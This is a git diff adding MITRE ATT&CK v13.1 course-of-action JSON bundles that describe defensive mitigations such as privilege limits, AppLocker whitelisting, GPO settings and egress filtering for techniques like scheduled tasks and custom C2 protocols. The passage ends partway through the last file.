@@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--bfee96fe-97ef-4901-910d-2dfabde7b06a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f2cb6ce2-188d-4162-8feb-594f949b13dd", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1053", + "url": "https://attack.mitre.org/mitigations/T1053", + "source_name": "mitre-attack" + }, + { + "url": "https://github.com/mattifestation/PowerSploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "source_name": "Powersploit" + }, + { + "source_name": "TechNet Server Operator Scheduled Task", + "description": "Microsoft. (2012, November 15). Domain controller: Allow server operators to schedule tasks. Retrieved December 18, 2017.", + "url": "https://technet.microsoft.com/library/jj852168.aspx" + }, + { + "source_name": "TechNet Scheduling Priority", + "description": "Microsoft. (2013, May 8). Increase scheduling priority. Retrieved December 18, 2017.", + "url": "https://technet.microsoft.com/library/dn221960.aspx" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. 
Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:19.375Z", + "name": "Scheduled Task Mitigation", + "description": "Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)\n\nConfigure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\SubmitControl. The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. 
(Citation: TechNet Server Operator Scheduled Task)\n\nConfigure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)\n\nIdentify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba.json new file mode 100644 index 0000000000000000000000000000000000000000..a67e35e91f43f9e22c55e082c4053486a1ff8ca7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--cca9f8a7-d131-4914-8f9f-9ece7a660ee0", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f2dcee22-c275-405e-87fd-48630a19dfba", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1203", + "external_id": "T1203" + }, + { + "url": "https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/", + "description": "Cowan, C. (2017, March 23). Strengthening the Microsoft Edge Sandbox. Retrieved March 12, 2018.", + "source_name": "Windows Blogs Microsoft Edge Sandbox" + }, + { + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/", + "description": "Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.", + "source_name": "Ars Technica Pwn2Own 2017 VM Escape" + }, + { + "url": "https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/", + "description": "Nunez, N. (2017, August 9). Moving Beyond EMET II \u2013 Windows Defender Exploit Guard. Retrieved March 12, 2018.", + "source_name": "TechNet Moving Beyond EMET" + }, + { + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity", + "description": "Wikipedia. (2018, January 11). Control-flow integrity. 
Retrieved March 12, 2018.", + "source_name": "Wikipedia Control Flow Integrity" + } + ], + "modified": "2019-07-24T19:22:39.193Z", + "name": "Exploitation for Client Execution Mitigation", + "description": "Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nOther types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nSecurity applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3.json new file mode 100644 index 0000000000000000000000000000000000000000..3397688d42dfe69bb8073f8281e18831d118ebfd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--495ab9ef-17fd-4005-9aad-975f4816ee01", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f3d0c735-330f-43c2-8e8e-51bcfa51e8c3", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1094", + "external_id": "T1094" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-24T18:13:22.017Z", + "name": "Custom Command and Control Protocol Mitigation", + "description": "Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.\n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. 
(Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6469191-1814-4dbe-a081-2a6daf83a10b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6469191-1814-4dbe-a081-2a6daf83a10b.json new file mode 100644 index 0000000000000000000000000000000000000000..58dc6cff5c379ead828117b164955c7f0a582fc8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6469191-1814-4dbe-a081-2a6daf83a10b.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--0bdf2e41-701e-46a5-88ed-24d9c13ac678", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f6469191-1814-4dbe-a081-2a6daf83a10b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1057", + "url": "https://attack.mitre.org/mitigations/T1057", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.656Z", + "name": "Process Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575.json new file mode 100644 index 0000000000000000000000000000000000000000..363e12083da6fe4c9260efd324a939183956e3d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--31b1b938-47b7-4dcf-a48e-3da903ee2542", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1205", + "external_id": "T1205" + } + ], + "modified": "2019-07-25T11:25:50.338Z", + "name": "Port Knocking Mitigation", + "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e.json new file mode 100644 index 0000000000000000000000000000000000000000..611501eb8ec5978257787c76406ca3a1d1c748eb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--f3162000-a771-4818-bb05-ab1900bf8ac7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1108", + "url": "https://attack.mitre.org/mitigations/T1108", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + }, + { + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "source_name": "University of Birmingham C2" + } + ], + "modified": "2021-08-23T20:25:18.593Z", + "name": "Redundant Access Mitigation", + "description": "Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)\n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c.json new file mode 100644 index 0000000000000000000000000000000000000000..2471db0efafb6efc9dc39e76d1f62bed0824cfba --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--b0871b49-93e6-4fd1-b5b4-058b3033cb71", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T15:52:18.525Z", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c", + "created": "2019-06-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1036", + "external_id": "M1036" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a.json new file mode 100644 index 0000000000000000000000000000000000000000..cd5a3fff3732177f626b18a44f842f2f3fe0bdea --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--6e5fa136-dba8-4089-8a96-5c42c1970ec2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1143", + "external_id": "T1143" + } + ], + "modified": "2019-07-24T19:36:50.328Z", + "name": "Hidden Window Mitigation", + "description": "Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b.json new file mode 100644 index 0000000000000000000000000000000000000000..e0f7a7560104bde0c8217a2fa30dc6508760569d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--d6406779-a55b-43dc-90cd-541ca09ce146", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--fcbe8424-eb3e-4794-b76d-e743f5a49b8b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1132", + "external_id": "T1132" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-24T18:25:06.552Z", + "name": "Data Encoding Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf.json new file mode 100644 index 0000000000000000000000000000000000000000..5b11c1cb10000e5451aa27359f1bbb93732cca4f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--439cff4b-f5fe-49d9-8497-4a61de09b170", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1031", + "url": "https://attack.mitre.org/mitigations/T1031", + "source_name": "mitre-attack" + }, + { + "url": "https://github.com/mattifestation/PowerSploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "source_name": "Powersploit" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + } + ], + "modified": "2020-01-17T16:45:23.126Z", + "name": "Modify Existing Service Mitigation", + "description": "Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. 
Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for Privilege Escalation weaknesses. (Citation: Powersploit)\n\nIdentify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157.json new file mode 100644 index 0000000000000000000000000000000000000000..e116251222c2a1656af217bf566ad7973480edec --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--c29f0136-ee04-480c-aa2a-653bfa0b466a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157", + "type": "course-of-action", + "created": "2019-06-11T16:43:44.834Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1041", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ], + "modified": "2019-06-11T16:43:44.834Z", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e.json new file mode 100644 index 0000000000000000000000000000000000000000..4b24a6cd0ca36dd57838ff2732d7f52695c0dcc0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--207e4ea0-f37f-4794-afdb-01a05e093da8", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--ff5d862a-ae6b-4833-8c15-e235d654d28e", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1122", + "url": "https://attack.mitre.org/mitigations/T1122", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
